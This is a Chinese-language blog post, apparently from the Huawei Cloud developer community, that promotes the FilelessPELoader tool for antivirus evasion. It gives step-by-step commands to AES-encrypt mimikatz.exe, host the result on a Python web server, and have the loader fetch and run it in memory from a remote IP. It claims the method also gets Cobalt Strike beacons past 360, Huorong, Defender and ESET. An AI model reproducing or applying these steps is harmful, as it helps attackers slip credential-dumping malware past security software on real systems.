免杀|FilelessPELoader免杀加载

举报
亿人安全 发表于 2023/05/14 10:54:23 2023/05/14
【摘要】 FilelessPELoader 免杀加载分享一个好用的 PE 远程加载项目https://github.com/TheD1rkMtr/FilelessPELoader远程内存加载,免杀大部分的杀软1、首先安装相关 python 库PLAINTEXT1pip install pycryptodome2、使用 aes.py 生成两个 bin 文件,分别为 cipher.bin 和 key.bi...

FilelessPELoader 免杀加载

分享一个好用的 PE 远程加载项目

https://github.com/TheD1rkMtr/FilelessPELoader

远程内存加载,免杀大部分的杀软

1、首先安装相关 python 库

PLAINTEXT 

1

pip install pycryptodome

2、使用 aes.py 生成两个 bin 文件,分别为 cipher.bin  key.bin

PLAINTEXT 

1

python aes.py mimikatz.exe

3、使用 python 开启 web 服务,

PLAINTEXT 

1
2
3

python -m http.server 80

python -m SimpleHTTPServer 8080

4、使用编译好的程序进行远程加载

image-20230214094250968

PLAINTEXT 

1
2

FilelessPELoader.exe 192.168.159.3 80 cipher.bin key.bin
[+] Usage: FilelessPELoader.exe <Host> <Port> <Cipher> <Key>

image-20230214092132134

同样可以免杀 cs 上线,测试可以免杀 360、火绒、def、eset

image-20230214094846819

image-20230214094404557

image-20230214094504083

【声明】本内容来自华为云开发者社区博主,不代表华为云及华为云开发者社区的观点和立场。转载时必须标注文章的来源(华为云社区)、文章链接、文章作者等基本信息,否则作者和本社区有权追究责任。如果您发现本社区中有涉嫌抄袭的内容,欢迎发送邮件进行举报,并提供相关证据,一经查实,本社区将立刻删除涉嫌侵权内容,举报邮箱: cloudbbs@huaweicloud.com
Python
  • 点赞
  • 收藏
  • 关注作者

评论(0

0/1000
抱歉,系统识别当前为高风险访问,暂不支持该操作

全部回复

上滑加载中

设置昵称

在此一键设置昵称,即可参与社区互动!

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

*长度不超过10个汉字或20个英文字符,设置后3个月内不可修改。

确认 取消

加入云驻计划,成为创作者

  • 华为云周边好礼
  • 免费体验产品
  • 特殊身份标识
  • 线下官方门票
  • 内部专家零距离
  • 与10000+优质创作者共同成长
立即加入